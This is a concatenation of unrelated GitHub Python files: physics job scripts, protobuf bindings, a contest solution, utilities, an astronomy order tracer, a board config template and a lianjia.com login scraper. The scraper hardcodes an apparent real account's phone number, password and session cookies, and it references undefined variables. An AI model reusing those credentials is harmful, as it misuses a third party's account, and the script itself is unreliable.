99a5ccdf1262a853052de6a1007107d9fb70371e | 3e4c9f69ea13636e2bf8766b3736af373a3c83f6 | /MonoHbb/RunAllRegionUsingFarmOut_wj.py | cf5d8db29d725dda489f493b8ab9557fbeeca3d8 | []
| no_license | ramankhurana/MonoH | c32f44fddb65677d31846ec6aa9c6c0ac0b5877b | 8495336ba22a81858fcaf23a7f4ebd7fc6880985 | refs/heads/master | 2020-04-18T14:41:40.393519 | 2017-08-10T11:16:53 | 2017-08-10T11:16:53 | 67,509,749 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,257 | py | #!/usr/bin/env python
#from MonoHBranchReader import AnalyzeDataSet, CheckFilter, MakeTable, DeltaR, Phi_mpi_pi
import os
mode='wj'
#inputfilename='NCUGlobalTuples_1.root'
#inputfilename='input.txt'
#outfilename='out.root'
inputfilename = os.environ['INPUT']
outfilename = os.environ['OUTPUT']
if mode == 'signal':
os.system('./MonoHBranchReader.py -m 100.0 -M 150.0 -i '+inputfilename+' -o '+outfilename+' -a -j 0 -J 2 -l 0 -L 1 --MLow1 100.0 --MHigh1 150.0 -F ')
if mode == 'signalpSB':
os.system('./MonoHBranchReader.py -m 30.0 -M 250.0 -i '+inputfilename+' -o '+outfilename+' -a -j 0 -J 2 -l 0 -L 1 --MLow1 30.0 --MHigh1 250.0 -F ')
## Mass Sidebands
## inverting the mass cut
if mode == 'zj':
os.system('./MonoHBranchReader.py -m 30.0 -M 100.0 -i '+inputfilename+' -o '+outfilename+' -a -j 0 -J 2 -l 0 -L 1 --MLow1 150.0 --MHigh1 250.0 -F')
##WJets
## 1 additinal lepton
## remove the mass cut
if mode == 'wj':
os.system('./MonoHBranchReader.py -m 30.0 -M 250.0 -i '+inputfilename+' -o '+outfilename+' -a -j 1 -J 2 -l 1 -L 2 --MLow1 30.0 --MHigh1 250.0 -F')
##TT
## 1 additional lepton
## >1 additional jets
if mode == 'tt':
os.system('./MonoHBranchReader.py -m 30.0 -M 250.0 -i '+inputfilename+' -o '+outfilename+' -a -j 2 -J 10 -l 1 -L 2 --MLow1 30.0 --MHigh1 250.0 -F')
## TT+WJ
if mode == 'wt':
os.system('./MonoHBranchReader.py -m 30.0 -M 250.0 -i '+inputfilename+' -o '+outfilename+' -a -j 0 -J 10 -l 1 -L 2 --MLow1 30.0 --MHigh1 250.0 -F')
## WJAlphaBet
if mode == 'wjalphabet':
os.system('./MonoHBranchReader.py -m 30.0 -M 100.0 -i '+inputfilename+' -o '+outfilename+' -a -j 1 -J 2 -l 1 -L 2 --MLow1 150.0 --MHigh1 250.0 -F')
## TTAlphabet
if mode == 'ttalphabet':
os.system('./MonoHBranchReader.py -m 30.0 -M 100.0 -i '+inputfilename+' -o '+outfilename+' -a -j 2 -J 10 -l 1 -L 2 --MLow1 150.0 --MHigh1 250.0 -F')
##WTAlphabet
if mode == 'wtalphabet':
os.system('./MonoHBranchReader.py -m 30.0 -M 100.0 -i '+inputfilename+' -o '+outfilename+' -a -j 0 -J 10 -l 1 -L 2 --MLow1 150.0 --MHigh1 250.0 -F')
| [
"[email protected]"
]
| |
c7b276ea5e16b96df513e71b6809af73b654a3e7 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_indigent.py | f6376ec43de6ef0c5d00c850cc39f702bc8227fb | [
"MIT"
]
| permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 371 | py |
#calss header
class _INDIGENT():
def __init__(self,):
self.name = "INDIGENT"
self.definitions = [u'very poor']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
| [
"[email protected]"
]
| |
a22f158e863b765ff5f010bb84b3bd9dd32b735d | 45c142c3e3dc8d3211a86c77385ecfdd10d28fb9 | /dstore/engine/procedures/mi_GetSettings_Ad_pb2.py | 1ec146af358a250e0ba95076adbffc3c35b2dc2a | []
| no_license | dstore-io/dstore-sdk-python | 945d64995c8892af18fab26c90117245abec64a4 | 8494d12ac77c3c3cc6dd59026407ef514ad179fc | refs/heads/master | 2020-06-14T13:07:08.181547 | 2017-01-26T11:19:39 | 2017-01-26T11:19:39 | 75,177,794 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | true | 11,246 | py | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: dstore/engine/procedures/mi_GetSettings_Ad.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from dstore import values_pb2 as dstore_dot_values__pb2
from dstore.engine import engine_pb2 as dstore_dot_engine_dot_engine__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='dstore/engine/procedures/mi_GetSettings_Ad.proto',
package='dstore.engine.mi_GetSettings_Ad',
syntax='proto3',
serialized_pb=_b('\n0dstore/engine/procedures/mi_GetSettings_Ad.proto\x12\x1f\x64store.engine.mi_GetSettings_Ad\x1a\x13\x64store/values.proto\x1a\x1a\x64store/engine/engine.proto\"\x98\x02\n\nParameters\x12,\n\x07user_id\x18\x01 \x01(\x0b\x32\x1b.dstore.values.IntegerValue\x12\x15\n\x0cuser_id_null\x18\xe9\x07 \x01(\x08\x12\x30\n\x0ckey_variable\x18\x02 \x01(\x0b\x32\x1a.dstore.values.StringValue\x12\x1a\n\x11key_variable_null\x18\xea\x07 \x01(\x08\x12\x46\n!search_for_key_variable_with_like\x18\x03 \x01(\x0b\x32\x1b.dstore.values.BooleanValue\x12/\n&search_for_key_variable_with_like_null\x18\xeb\x07 \x01(\x08\"\x80\x03\n\x08Response\x12\x38\n\x10meta_information\x18\x02 \x03(\x0b\x32\x1e.dstore.engine.MetaInformation\x12\'\n\x07message\x18\x03 \x03(\x0b\x32\x16.dstore.engine.Message\x12:\n\x03row\x18\x04 \x03(\x0b\x32-.dstore.engine.mi_GetSettings_Ad.Response.Row\x1a\xd4\x01\n\x03Row\x12\x0f\n\x06row_id\x18\x90N \x01(\x05\x12.\n\tuser_name\x18\x91N \x01(\x0b\x32\x1a.dstore.values.StringValue\x12-\n\x07user_id\x18\x92N \x01(\x0b\x32\x1b.dstore.values.IntegerValue\x12*\n\x05value\x18\x93N \x01(\x0b\x32\x1a.dstore.values.StringValue\x12\x31\n\x0ckey_variable\x18\x94N \x01(\x0b\x32\x1a.dstore.values.StringValueBR\n\x1bio.dstore.engine.proceduresZ3gosdk.dstore.de/engine/procedures/mi_GetSettings_Adb\x06proto3')
,
dependencies=[dstore_dot_values__pb2.DESCRIPTOR,dstore_dot_engine_dot_engine__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_PARAMETERS = _descriptor.Descriptor(
name='Parameters',
full_name='dstore.engine.mi_GetSettings_Ad.Parameters',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='user_id', full_name='dstore.engine.mi_GetSettings_Ad.Parameters.user_id', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='user_id_null', full_name='dstore.engine.mi_GetSettings_Ad.Parameters.user_id_null', index=1,
number=1001, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='key_variable', full_name='dstore.engine.mi_GetSettings_Ad.Parameters.key_variable', index=2,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='key_variable_null', full_name='dstore.engine.mi_GetSettings_Ad.Parameters.key_variable_null', index=3,
number=1002, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='search_for_key_variable_with_like', full_name='dstore.engine.mi_GetSettings_Ad.Parameters.search_for_key_variable_with_like', index=4,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='search_for_key_variable_with_like_null', full_name='dstore.engine.mi_GetSettings_Ad.Parameters.search_for_key_variable_with_like_null', index=5,
number=1003, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=135,
serialized_end=415,
)
_RESPONSE_ROW = _descriptor.Descriptor(
name='Row',
full_name='dstore.engine.mi_GetSettings_Ad.Response.Row',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='row_id', full_name='dstore.engine.mi_GetSettings_Ad.Response.Row.row_id', index=0,
number=10000, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='user_name', full_name='dstore.engine.mi_GetSettings_Ad.Response.Row.user_name', index=1,
number=10001, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='user_id', full_name='dstore.engine.mi_GetSettings_Ad.Response.Row.user_id', index=2,
number=10002, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='dstore.engine.mi_GetSettings_Ad.Response.Row.value', index=3,
number=10003, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='key_variable', full_name='dstore.engine.mi_GetSettings_Ad.Response.Row.key_variable', index=4,
number=10004, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=590,
serialized_end=802,
)
_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='dstore.engine.mi_GetSettings_Ad.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='meta_information', full_name='dstore.engine.mi_GetSettings_Ad.Response.meta_information', index=0,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='message', full_name='dstore.engine.mi_GetSettings_Ad.Response.message', index=1,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='row', full_name='dstore.engine.mi_GetSettings_Ad.Response.row', index=2,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_RESPONSE_ROW, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=418,
serialized_end=802,
)
_PARAMETERS.fields_by_name['user_id'].message_type = dstore_dot_values__pb2._INTEGERVALUE
_PARAMETERS.fields_by_name['key_variable'].message_type = dstore_dot_values__pb2._STRINGVALUE
_PARAMETERS.fields_by_name['search_for_key_variable_with_like'].message_type = dstore_dot_values__pb2._BOOLEANVALUE
_RESPONSE_ROW.fields_by_name['user_name'].message_type = dstore_dot_values__pb2._STRINGVALUE
_RESPONSE_ROW.fields_by_name['user_id'].message_type = dstore_dot_values__pb2._INTEGERVALUE
_RESPONSE_ROW.fields_by_name['value'].message_type = dstore_dot_values__pb2._STRINGVALUE
_RESPONSE_ROW.fields_by_name['key_variable'].message_type = dstore_dot_values__pb2._STRINGVALUE
_RESPONSE_ROW.containing_type = _RESPONSE
_RESPONSE.fields_by_name['meta_information'].message_type = dstore_dot_engine_dot_engine__pb2._METAINFORMATION
_RESPONSE.fields_by_name['message'].message_type = dstore_dot_engine_dot_engine__pb2._MESSAGE
_RESPONSE.fields_by_name['row'].message_type = _RESPONSE_ROW
DESCRIPTOR.message_types_by_name['Parameters'] = _PARAMETERS
DESCRIPTOR.message_types_by_name['Response'] = _RESPONSE
Parameters = _reflection.GeneratedProtocolMessageType('Parameters', (_message.Message,), dict(
DESCRIPTOR = _PARAMETERS,
__module__ = 'dstore.engine.procedures.mi_GetSettings_Ad_pb2'
# @@protoc_insertion_point(class_scope:dstore.engine.mi_GetSettings_Ad.Parameters)
))
_sym_db.RegisterMessage(Parameters)
Response = _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), dict(
Row = _reflection.GeneratedProtocolMessageType('Row', (_message.Message,), dict(
DESCRIPTOR = _RESPONSE_ROW,
__module__ = 'dstore.engine.procedures.mi_GetSettings_Ad_pb2'
# @@protoc_insertion_point(class_scope:dstore.engine.mi_GetSettings_Ad.Response.Row)
))
,
DESCRIPTOR = _RESPONSE,
__module__ = 'dstore.engine.procedures.mi_GetSettings_Ad_pb2'
# @@protoc_insertion_point(class_scope:dstore.engine.mi_GetSettings_Ad.Response)
))
_sym_db.RegisterMessage(Response)
_sym_db.RegisterMessage(Response.Row)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\033io.dstore.engine.proceduresZ3gosdk.dstore.de/engine/procedures/mi_GetSettings_Ad'))
import grpc
from grpc.beta import implementations as beta_implementations
from grpc.beta import interfaces as beta_interfaces
from grpc.framework.common import cardinality
from grpc.framework.interfaces.face import utilities as face_utilities
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
]
| |
85f61554cf66fecc3b5b8039b168fd7dffb6a7ef | 38e82df34efcb0ed819f49457210be9616caf875 | /ABC/001/1_b.py | 6bdba55ebd8cc3127a1ca59bbcc6bb1fe74238b8 | []
| no_license | oden6680/AtCoder | 96385ce02ff02909e2f17123dad67d63baa4a0f7 | 3b20885d86726fcf4617076d653abb125609125e | refs/heads/master | 2022-09-19T13:12:02.705304 | 2020-05-31T19:58:51 | 2020-05-31T19:58:51 | 263,191,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | N = int(input())
N = N/1000
if N < 0.1:
vv = 0
elif 0.1 <= N <= 5:
vv = 10 * N
elif 6 <= N <= 30:
vv = N + 50
elif 35 <= N <= 70:
vv = (N-30)/5 + 80
elif N > 70:
vv = 89
print(str(int(vv)).zfill(2)) | [
"[email protected]"
]
| |
42520a99c2baa0939e5f98eaaa0557f0cd41267d | 4bc19f4dd098ebedcb6ee78af0ae12cb633671fe | /chat_tornadio/utils.py | 4b8d14624b491fecf606f0044b54b05fb6f57ba5 | []
| no_license | StanislavKraev/rekvizitka | 958ab0e002335613a724fb14a8e4123f49954446 | ac1f30e7bb2e987b3b0bda4c2a8feda4d3f5497f | refs/heads/master | 2021-01-01T05:44:56.372748 | 2016-04-27T19:20:26 | 2016-04-27T19:20:26 | 57,240,406 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 199 | py | # -*- coding: utf-8 -*-
import time
def get_cts():
return int(round(time.time() * 100000))
def cts_from_timedelta(td):
ts = td.seconds + td.days * 24 * 3600
return ts * 100000
| [
"[email protected]"
]
| |
99d9e5dbdc792339e2c8bba2b457342b933a13d6 | f0a5ad7b8aa39f51f233391fead0da3eabecc4ee | /.history/move_20191127160834.py | d778b2ac46a5923d344172f9540fa2d93731f29a | []
| no_license | OseiasBeu/webScrapping | e0a524847e55b24dbbd3d57bbe7fa43b4e101f48 | 1e72c7551aea355a891043baecfcbab8a89e719a | refs/heads/master | 2022-10-25T18:12:50.858653 | 2020-06-18T01:29:24 | 2020-06-18T01:29:24 | 224,681,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | import os, shutil, glob
oldAddres = 'C:/Users/beuo/Downloads/*.xlsx'
newAdress = 'C:/Users/beuo/Documents/Demandas/AtualizaMiddleIntegrationVtex'
shutil.copy(oldAdress, newAdress)
# try:
# os.makedirs(dst_fldr)
# except:
# print("erro")
# for xlsx_file in glob.glob(src_fldr+"//*.xlsx"):
# shutil.copy2(src_fldr,dst_fldr)
| [
"[email protected]"
]
| |
2c86b17eb75e0656480c03e3bf0711470a886191 | 6761d430bfa38413985efb319cb02171729f3481 | /indlulamithi/makeorders.py | b447228ba164705bde80fab09cd18d08bb090391 | [
"BSD-3-Clause"
]
| permissive | crawfordsm/indlulamithi | b335b469dabefa8b4e1d6dbaafb18eb99c0ee348 | 3d88278f3e7ca5ac46a6bf987eeb475739bd8f22 | refs/heads/master | 2020-12-24T16:05:54.929254 | 2015-01-27T20:41:26 | 2015-01-27T20:41:26 | 29,680,902 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,815 | py | import sys
import os
import numpy as np
from scipy import ndimage as nd
from astropy.io import fits
from astropy import stats
def minflattenimage(data, size=10):
"""Smooth the image and flatten it using the minimum value in the image
Parameters
----------
data: ndarray
image to flatten
size: int
smoothing size for image
Returns
-------
data: ndarray
flattenned image
"""
# flatten image in y direction
m = np.median(data, axis=1)
m = nd.minimum_filter(m, size=size)
m.shape = (len(m), 1)
data = data / m
# flatten image in x direction
m = np.median(data, axis=0)
m = nd.minimum_filter(m, size=size)
data = data / m
return data
def calc_coef(data, xc, yc):
"""Given a position of an order,
determine the equations that defines
its position in the image
"""
yc = int(yc)
cutout = data.copy()
obj, sci_num = nd.label(cutout)
cutout[obj != obj[yc, xc]] = 0
y, x = np.where(cutout > 0)
coef = np.polyfit(x, y, 2)
return cutout, coef
def make_orders(data, xc=680, limit=1.5, image_size=10, order_size=2, outfile=None):
"""Determine coefficients that describe all of the orders in the image
Parameters
----------
data: ndarray
image array with orders in the image
xc: int
Column to extract orders from
limit: float
Limit for select orders in flattened data
image_size: int
Size for minimum filtering of images
order_size: int
Size for minimum filtering of orders
Returns
-------
order_dict: dict
Dictionary with the key representing the y-position of the
order at xc and containing a list of coefficients describing
the shape of the order
"""
# flatten the data
data = minflattenimage(data, image_size)
# create a rough image of just the location of the orders
mask = (data < limit)
data[mask] = 0
# clean up the orders and caculate
# starting position for each order
n = nd.minimum_filter(data[:, xc], size=order_size)
o, num = nd.label(n)
pos = nd.center_of_mass(n, o, range(1, num))
pos = np.array(pos)
# determine the shape of the orders
order_dict = {}
for yc in pos:
yc = yc[0]
cutout, coef = calc_coef(data, xc, yc)
order_dict[yc] = coef
if outfile is not None:
keys = sorted(order_dict.keys())
fout = open(outfile, 'w')
for i in keys:
coef = order_dict[i]
output = '%i ' % i
output += ' '.join(['%e' % x for x in coef])
if i > 0:
fout.write(output + '\n')
fout.close()
return order_dict
| [
"[email protected]"
]
| |
6fff6f6268ec05e04bfd66704d708b4988f2a055 | b47289da22cab052a5aa86c940ee45073a82edcb | /board/board_config_tmpl.py | 0bc4e4365410ce214346b7805cc4ae67d130f9fa | [
"MIT"
]
| permissive | domenc/mqboard | 3195d4d9342f4a2d805fe17f6e22d240af265a7a | 46ccff99ac60f4f2cb892f41f2b5f8d5a1bc59a9 | refs/heads/master | 2022-11-08T05:33:30.286187 | 2020-07-02T06:25:56 | 2020-07-02T06:25:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,414 | py | # board_config contains magic strings that don't get published or checked into source control
# kind tells us which type of board this is running, it is used in board to define LED pins
kind = "nodemcu" <--- UPDATE
#kind = "huzzah32"
#kind = "lolin-d32"
#kind = "esp32thing"
#kind = "tinypico"
#kind = "ezsbc"
# location is the system name and is used in mqtt topics, etc
location = "mqtest"
wifi_ssid = "MY-SSID" <--- UPDATE
wifi_pass = "MY-PASSWD" <--- UPDATE
# directories to add to the system search path (after ["", "/lib"]), not applied in safe mode
syspath = ["/src"]
#
# Configuration of loaded modules
#
# The dicts below get passed to the start() function of the modules loaded by main.py.
# The name of each dict must match the name of the module.
mqtt = { # refer to mqtt_async for the list of config options
"server" : "192.168.0.14", <--- UPDATE
"ssl_params" : { "server_hostname": "mqtt.example.com" }, <--- UPDATE/REMOVE
"user" : "esp32/mqtest", <--- UPDATE/REMOVE
"password" : "00000000000000000000000000000000", <--- UPDATE/REMOVE
"ssid" : wifi_ssid,
"wifi_pw" : wifi_pass,
}
# little convenience for demo to support with and without mqtt["user"]
mqtt_prefix = mqtt.get("user", "esp32/" + location)
mqrepl = {
"prefix" : mqtt_prefix + "/mqb/", # prefix is before cmd/... or reply/...
}
watchdog = {
"prefix" : mqrepl["prefix"], # must be mqrepl["prefix"]
"timeout" : 120, # watchdog timeout in seconds, default is 300
"allok" : 180, # wait time in secs after connection before giving all-OK (no safe mode)
"revert" : True, # whether to revert from safe mode to normal mode after all-OK time
}
logging = {
"topic" : mqtt_prefix + "/log",
"boot_sz" : 10*1024, # large buffer at boot, got plenty of memory then
"boot_level" : 10, # 10=debug, 20=info, 30=warning (avoiding import logging)
"loop_sz" : 1024, # more moderate buffer once connected
"loop_level" : 10, # 10=debug, 20=info, 30=warning (avoiding import logging)
}
# Modules to load and call start on. For module foo, if this file defines foo then
# foo.start(mqtt, foo) is called, else foo.start(mqtt, {}). If there is no foo.start() then
# that's OK too.
modules = [ "mqtt", "logging", "mqrepl", "watchdog" ]
| [
"[email protected]"
]
| |
aa15b71a1cc27dd14e3c13a3ec4e6b9bd3731eff | 3851a5f2233aa68ae98aa4cd813e0a6dcbda464e | /spider/ljspiderdiy/LianJiaLogIn.py | 81d551a2b649d37d4a2357031d1d77ca537995f2 | []
| no_license | scmsqhn/yunying | 976a2c9fff98613361d4b28719080d9e4d8112dc | 3c30b6985ac974bc75d50e8abe0b69174fb46700 | refs/heads/master | 2021-01-19T21:06:21.778902 | 2017-04-25T09:14:00 | 2017-04-25T09:14:00 | 88,607,812 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,790 | py | # -*- coding: utf-8 -*-
"""
@author: 冰蓝
@site: http://lanbing510.info
"""
import urllib
import urllib2
import json
import cookielib
import re
import zlib
from cookielib import Cookie, CookieJar
import Cookie
#获取Cookiejar对象(存在本机的cookie消息)
cookie = cookielib.CookieJar()
Cookie='lianjia_uuid=205d25a0-3fa2-4b8b-89d6-9bc268f11a55; gr_user_id=dba46ec7-3d71-452b-89aa-47e5c3769e45; Hm_lvt_678d9c31c57be1c528ad7f62e5123d56=1487292480; all-lj=007e0800fb44885aa2065c6dfaaa4029; Hm_lvt_efa595b768cc9dc7d7f9823368e795f1=1486726371,1487292481,1488013426; Hm_lpvt_efa595b768cc9dc7d7f9823368e795f1=1488013426; Hm_lvt_660aa6a6cb0f1e8dd21b9a17f866726d=1487987111,1487998799,1487998878,1487998894; Hm_lpvt_660aa6a6cb0f1e8dd21b9a17f866726d=1488024890; _smt_uid=589d8429.404337d7; CNZZDATA1253492306=676618900-1486715611-http%253A%252F%252Fcn.bing.com%252F%7C1488021670; CNZZDATA1254525948=208011574-1486714296-http%253A%252F%252Fcn.bing.com%252F%7C1488021183; CNZZDATA1255633284=1067758961-1486715301-http%253A%252F%252Fcn.bing.com%252F%7C1488022596; CNZZDATA1255604082=435151434-1486716209-http%253A%252F%252Fcn.bing.com%252F%7C1488019770; _ga=GA1.2.1413369539.1486717997; gr_session_id_a1a50f141657a94e=cd746b33-1513-4ff3-9cc7-55877f30753d; select_city=110000; lianjia_token=2.0058b830d0224728c4491519e1353a413d; lianjia_ssid=7235edd6-6171-e796-d406-78b18c3df6fc'
cookie.set_cookie(Cookie)
#自定义opener,并将opener跟CookieJar对象绑定
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))
#安装opener,此后调用urlopen()时都会使用安装过的opener对象
urllib2.install_opener(opener)
def build_opener_with_cookie_str(cookie_str, domain, path='/'):
simple_cookie = Cookie.SimpleCookie(cookie_str) # Parse Cookie from str
cookiejar = cookielib.CookieJar() # No cookies stored yet
for c in simple_cookie:
cookie_item = cookielib.Cookie(
version=0, name=c, value=str(simple_cookie[c].value),
port=None, port_specified=None,
domain=domain, domain_specified=None, domain_initial_dot=None,
path=path, path_specified=None,
secure=None,
expires=None,
discard=None,
comment=None,
comment_url=None,
rest=None,
rfc2109=False,
)
cookiejar.set_cookie(cookie_item) # Apply each cookie_item to cookiejar
return urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar)) # Return opener
cookie_str = ck#'tLargeScreenP=1; Authorization=Basic%20HereIsMySecret; subType=pcSub; TPLoginTimes=2'
opener = build_opener_with_cookie_str(cookie_str, domain= authurl)
home_url = 'http://cd.lianjia.com/'
#auth_url = 'https://passport.lianjia.com/cas/login?service=http%3A%2F%2Fcd.lianjia.com%2F'
auth_url = 'https://m.lianjia.com/my/login?redirect=/my/index'
#auth_url = 'https://passport.lianjia.com/cas/login?service=http%3A%2F%2Fcd.lianjia.com%2F&renew=1'
#auth_url = 'https://passport.lianjia.com/cas/login?service=http://cd.lianjia.com/&renew=1'
chengjiao_url = 'http://cd.lianjia.com/chengjiao/'
'''
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Cache-Control': 'no-cache',
'Connection': 'keep-alive',
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'passport.lianjia.com',
'Pragma': 'no-cache',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'
}
'''
headers = {
'Accept': 'image/webp,image/*,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate, sdch, br',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Cache-Control': 'no-cache',
'Connection': 'keep-alive',
'Content-Type': 'image/x-icon',
# 'Host': 'passport.lianjia.com',
'Host': 'https://passport.lianjia.com/cas/login?service=http%3A%2F%2Fcd.lianjia.com%2F',
'Pragma': 'no-cache',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'
}
# 获取lianjia_uuid
req = urllib2.Request('http://cd.lianjia.com/')
opener.open(req)
# 初始化表单
req = urllib2.Request(auth_url, headers=headers)
result = opener.open(req)
# 获取cookie和lt值
pattern = re.compile(r'JSESSIONID=(.*)')
jsessionid = pattern.findall(result.info().getheader('Set-Cookie').split(';')[0])[0]
html_content = result.read()
gzipped = result.info().getheader('Content-Encoding')
if gzipped:
html_content = zlib.decompress(html_content, 16+zlib.MAX_WBITS)
pattern = re.compile(r'value=\"(LT-.*)\"')
lt = pattern.findall(html_content)[0]
pattern = re.compile(r'name="execution" value="(.*)"')
execution = pattern.findall(html_content)[0]
# data
data = {
'username': '13678028750', #替换为自己账户的用户名
'password': 'lianjia333333$', #替换为自己账户的密码
'execution': execution,
'_eventId': 'submit',
'lt': lt,
'verifyCode': '',
'redirect': '',
}
print data
# urllib进行编码
post_data=urllib.urlencode(data)
req = urllib2.Request(auth_url, post_data, headers)
try:
result = opener.open(req)
except urllib2.HTTPError, e:
print e.getcode()
print e.reason
print e.geturl()
print e.info()
# 被禁掉后,不再次登录,一面被列入黑名单;
# req = urllib2.Request(e.geturl())
# result = opener.open(req)
# req = urllib2.Request(chengjiao_url)
# result = opener.open(req).read()
#print result
| [
"[email protected]"
]
| |
aca7f484f5a03a70cba8f08aa9de457a46a307c0 | 6098c4c76b937fe44f941893c6aa6ad4d0412000 | /doug_proj/doug/credentials_template.py | 87f9a3614b60401c316266034e6efb4905579d58 | []
| no_license | kishan/doug | 8979d7fa6885fe143e42c9b7fed024c487ff94ad | 6482b60bc4dcbdf7ac6460db0f3da7c4342482c2 | refs/heads/master | 2021-01-22T05:06:45.557212 | 2017-02-12T23:03:18 | 2017-02-12T23:03:18 | 81,622,898 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 137 | py | # copy template below and save in file called credentials.py
CREDENTIALS = {
"access_token":"",
"VALIDATION_TOKEN":"",
"api_key":""
} | [
"[email protected]"
]
| |
74346e82fb06a0cd34614b8570a7c22230e3218e | 3712a929d1124f514ea7af1ac0d4a1de03bb6773 | /开班笔记/个人项目/果园/project/userinfo/views.py | 1eb53cd0c7dd00a94ef94e8a2ede204e24208a68 | []
